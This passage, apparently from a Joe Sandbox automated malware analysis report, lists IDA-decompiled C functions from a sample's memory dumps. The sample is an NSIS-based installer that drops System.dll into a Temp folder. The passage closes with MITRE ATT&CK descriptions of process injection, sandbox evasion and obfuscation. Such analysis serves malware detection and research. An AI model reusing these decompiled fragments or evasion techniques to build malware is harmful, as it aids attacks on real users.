							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E73281381(_t80, E732812E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E73281603(_t10,  *0x73285074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x73285040;
							 *0x73285040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x73285070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E73281603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x7328506c +  *0x7328506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E73281603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x73285070);
						 *( *0x73285070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x732810eb
0x73281100
0x73281109
0x7328110e
0x73281119
0x7328111c
0x73281125
0x73281129
0x7328112b
0x732812b0
0x732812ba
0x732812ba
0x73281132
0x73281132
0x73281137
0x73281138
0x7328113a
0x7328113d
0x73281256
0x73281259
0x73281271
0x73281271
0x73281278
0x00000000
0x00000000
0x73281285
0x7328128a
0x7328128f
0x73281294
0x7328129a
0x7328129b
0x00000000
0x7328129b
0x7328125b
0x7328125e
0x732811bc
0x732811bf
0x732811c2
0x732811cb
0x732811d0
0x00000000
0x732811d1
0x73281264
0x73281266
0x732811a2
0x732811a5
0x732811a8
0x732811b1
0x00000000
0x732811b1
0x73281164
0x73281165
0x73281177
0x73281180
0x73281184
0x7328118e
0x73281191
0x73281193
0x73281193
0x00000000
0x73281165
0x73281143
0x73281218
0x7328121d
0x73281221
0x73281223
0x7328122c
0x7328122f
0x73281238
0x7328123d
0x7328123d
0x73281247
0x7328124a
0x00000000
0x73281250
0x73281149
0x7328114c
0x732811e9
0x732811ed
0x732811f7
0x732811fb
0x73281205
0x7328120a
0x73281211
0x00000000
0x73281211
0x73281152
0x73281155
0x00000000
0x00000000
0x7328115b
0x7328115e
0x732811b8
0x00000000
0x732811b8
0x73281160
0x73281162
0x7328119e
0x00000000
0x7328119e
0x00000000
0x732812a1
0x732812a1
0x732812ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 73281171
GlobalAlloc.KERNEL32(00000040,?), ref: 732811E3
GlobalFree.KERNEL32 ref: 7328124A
GlobalFree.KERNEL32(?), ref: 7328129B
GlobalFree.KERNEL32(00000000), ref: 732812B1

Memory Dump Source

Source File: 00000009.00000002.722913626.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true

Associated: 00000009.00000002.722901717.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722939825.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722947781.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73280000_vbc.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: b30f8b16a9929c06682517c255e62fc699cd63c29608cb870f802680e8e0e983
Instruction ID: 2b7ff6cefeae060417f7d1f7aee24ae4471fa8e3051e53f7a67dcec46da4f5de
Opcode Fuzzy Hash: b30f8b16a9929c06682517c255e62fc699cd63c29608cb870f802680e8e0e983
Instruction Fuzzy Hash: 8E519BB6A00322DFE700DF69C848BE677F8EB08715B248119E94ADB2D4E775B990DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Albus\AppData\Local\Temp\nsv7B0.tmp", "C:\Users\Albus\AppData\Local\Temp\nsv7B0.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Albus\AppData\Local\Temp\nsv7B0.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Albus\AppData\Local\Temp\nsv7B0.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsv7B0.tmp, xrefs: 00402683
C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp$C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll
API String ID: 1659193697-433538786
Opcode ID: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
Opcode Fuzzy Hash: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x42aa20 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}

0x00403020
0x00403040
0x0040304a
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32 ref: 0040302C
GetTickCount.KERNEL32(00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040304A
CreateDialogParamW.USER32 ref: 00403067
ShowWindow.USER32(00000000,00000005), ref: 00403075

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405f20
0x00405f2b
0x00405f2f
0x00405f36
0x00405f42
0x00405f52
0x00405f54
0x00405f6c
0x00405f6d
0x00405f74
0x00405f75
0x00000000
0x00000000
0x00405f58
0x00405f5f
0x00405f67
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f5f
0x00405f77
0x00000000
0x00405f8b
0x00405f44
0x00405f4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f4a
0x00405f31
0x00000000

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-4017390910
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}

0x00405517
0x00405521
0x0040553d
0x0040555f
0x00405562
0x00405568
0x00405572
0x00405573
0x00405575
0x0040557b
0x0040557b
0x00405585
0x00000000
0x00405593
0x0040554a
0x00405582
0x00405582
0x00000000
0x00405582
0x00405556
0x00405558
0x00000000
0x00405558
0x00405527
0x00000000
0x00000000
0x0040552e
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406419
0x0040641b
0x00406433
0x00406438
0x0040643d
0x0040647b
0x0040647b
0x0040643f
0x00406451
0x0040645c
0x00406462
0x0040646d
0x00000000
0x00000000
0x0040646d
0x00406481

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406451
RegCloseKey.ADVAPI32(?), ref: 0040645C

Strings

Call, xrefs: 00406412

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}

0x00403b58
0x00403b60
0x00403b67
0x00403b6a
0x00403b6a
0x00403b6c
0x00403b71
0x00403b78
0x00403b7e
0x00403b82
0x00403b83
0x00403b8b

APIs

FreeLibrary.KERNEL32(?,74EDD4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
GlobalFree.KERNEL32(?), ref: 00403B78

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-4017390910
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405fa2
0x00405fa4
0x00405fa7
0x00405fd3
0x00405fac
0x00405fb5
0x00405fba
0x00405fc5
0x00405fc8
0x00405fe4
0x00405fca
0x00405fd1
0x00000000
0x00405fd1
0x00405fdd
0x00405fe1
0x00405fe1
0x00405fdb
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
CharNextA.USER32(00000000), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
